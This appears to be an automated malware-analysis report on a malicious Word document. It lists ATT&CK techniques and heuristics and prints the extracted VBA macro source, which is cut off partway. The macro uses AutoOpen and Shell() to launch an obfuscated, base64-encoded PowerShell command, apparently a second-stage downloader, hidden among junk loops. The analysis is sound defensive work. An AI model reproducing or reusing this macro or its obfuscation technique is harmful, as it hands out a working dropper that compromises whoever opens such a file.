MALICIOUS
182
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
The sample contains a VBA macro with an AutoOpen subroutine that calls a function which uses the Shell() command. This function attempts to construct and execute a command string, likely to download and execute a second-stage payload. The constructed command string is 'vbFkai + Chr(zWFUr + vbKeyP + ECBmLnMP) + "owers" + mbhjLO + QNWtNwqq + hXUZAbip + dhiZTz + SjwCFiRXE', which appears to be an obfuscated attempt to run a PowerShell command.
Heuristics 6
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 12616 bytes |
SHA-256: 18f783f27469e7d652a1968a748478fe043e59aa693b91d40390695d960a83e0 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "GrskhWwiI"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function BjPltPav()
On Error Resume Next
For qqRiW = GhwVj To RsGzp
For YAMGIQ = YWibTE To 48241
KkaAsu = (88725 / CBool(rirzVT) - tTmha / Oct(66325 / Hex(86928) / hApwDb + Rnd(cRHWH / Fix(37))))
Next
fzzwi = 30039 - 40577
Next
For QRXETl = jWwJR To tzCwqJ
For CarwMt = UplwS To 46358
RjStj = (80096 / CBool(vvJMqJ) - zuAnFj / Oct(48839 / Hex(81574) / YsaXnr + Rnd(BrsqcP / Fix(37))))
Next
CHUoGf = 64246 - 73199
Next
BjPltPav = cjTLdQiMkzU + Shell(vbFkai + Chr(zWFUr + vbKeyP + ECBmLnMP) + "owers" + mbhjLO + QNWtNwqq + jATWWtRft + hXUZAbip + dhiZTz + SjwCFiRXE, 67765 - 67765)
For kbUul = NojaJ To AJRJEK
For VzSKj = zflvS To 21953
mWpwSw = (97888 / CBool(dEHBGp) - wCiBU / Oct(47945 / Hex(31105) / RRkjo + Rnd(btQPQI / Fix(37))))
Next
TVqILQ = 84446 - 86480
Next
End Function
Sub Autoopen()
On Error Resume Next
For IdWvj = QRrTVw To iiMKN
For Kqmpj = fjntI To 15825
fGJHN = (87205 / CBool(sczYzm) - vrIvBC / Oct(79514 / Hex(65678) / WnpWB + Rnd(dXiLz / Fix(37))))
Next
RVazR = 32631 - 20123
Next
BjPltPav
For qOsutk = iwHFiz To mTYXvp
For cploMd = hvkli To 111
IvucRN = (97045 / CBool(aGOVj) - HbuVUi / Oct(28319 / Hex(46436) / FhGTw + Rnd(XTEzH / Fix(37))))
Next
XduicB = 6659 - 28911
Next
End Sub
Attribute VB_Name = "aqznaUpQJRP"
Function mbhjLO()
On Error Resume Next
For sfkknb = FGBap To hkaiZ
For qTLvQ = psKjNU To 90880
wwPXXV = (70445 / CBool(kldJjp) - fiIVV / Oct(73261 / Hex(34702) / kTwziH + Rnd(tjfPN / Fix(37))))
Next
VDLDlJ = 68172 - 49693
Next
rUdAbUdo = "HeLL -e IAAoAG" + "4AZQBX" + "AC0ATwBCAEoARQB" + "DAHQAIAAgAFMAe" + "QB" + "zAF" + "QAZQBtA"
For GHzoi = Ezaoj To fDbXC
For OsziR = SKbzRj To 54746
HSMozt = (55723 / CBool(phEah) - pzkjj / Oct(70869 / Hex(40131) / UcpXWU + Rnd(GhqLzH / Fix(37))))
Next
rmZIv = 96071 - 6582
Next
DbozKaYhlw = "C4ASQBPAC4AQw" + "BPAG0AcABSAEUAc" + "wBTAGkATwBOAC4A" + "RABF" + "AGYAbABBAFQ" + "ARQBzAFQAcgBlA" + "EEAbQAo" + "AFsA"
For ZqvwU = NkArNa To kzaXIm
For zOPjOc = wGapW To 57440
CzcZz = (4623 / CBool(zqUkhP) - nzlnL / Oct(39995 / Hex(30785) / bLisT + Rnd(dZCqw / Fix(37))))
Next
hzzzJk = 79839 - 4402
Next
tDLDfi = "UwB" + "ZAFMAdABF" + "AG0ALgBpAG" + "8AL"
For uzhNB = HpCLJ To rXQqGj
For TQRtkW = nCnda To 60156
mjMBi = (32801 / CBool(WjAfn) - qbjHC / Oct(1796 / Hex(22676) / HcFwrd + Rnd(FCYkd / Fix(37))))
Next
FqEpbS = 48499 - 95307
Next
oJjbFO = "gBNAGUATQB" + "vA" + "FIAWQBzAHQ" + "AcgBlAG" + "EAbQB"
For ROzSiL = jaaTf To DGFnnh
For jcuJc = kcRaim To 71213
LrwYuL = (69128 / CBool(zKKwZ) - zkoisj / Oct(916 / Hex(79067) / opzbt + Rnd(ArjuF / Fix(37))))
Next
PGOsVj = 19856 - 58614
Next
KzUiztjBnGr = "dAFsAcwBZ" + "AHMA" + "VABlAG0A" + "LgBjAG8AbgBWA" + "GUAUgBUAF0A" + "OgA6AGY" + "AUgBPAE0AYgB" + "BA" + "HMARQA2" + "ADQAUwB"
For zjLzfh = EuEZWY To jzkqI
For TdCUui = ZlWAqK To 68559
JmdOhN = (75742 / CBool(pfVqwf) - lpChQV / Oct(58783 / Hex(81817) / wDNSY + Rnd(jLoVa / Fix(37))))
Next
Hcajf = 82658 - 23252
Next
pOGXJZJzfV = "0AHIAaQBOAEcAK" + "AAg" + "ACcAVgBa" + "AEIAdAB" + "UADgASgBB" + "AEQATQ" + "BlAC8AeQByADE" + "AWQ" + "BzAGkAMw"
For Zrhtql = ndSTi To aRdAVO
For vJCaFj = NbzkiS To 2408
FVUbmt = (91551 / CBool(VCvPjL) - jKcatP / Oct(79300 / Hex(13537) / GHzMjh + Rnd(MuwMHf / Fix(37))))
Next
brAbjY = 19854 - 38483
Next
QiVKiZzuh = "BLAEw" + "AWQ" + "BaAEUAaABN" + "AFUARQBlAFQA" + "QQBZAE0AOABLAG" + "oAbwBEAEUAe" + "AB0ADEAdABoAEIA" + "KwBOAHU" + "AMwBoAF" + "UAS"
For BiNaCs = OPOjV To wjBnOj
For kzpDR = isoIi To 56110
KvhTHm = (38183 / CBool(iwtzXw) - RZsJaw / Oct(23599 / Hex(4394) / JIBJOa
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.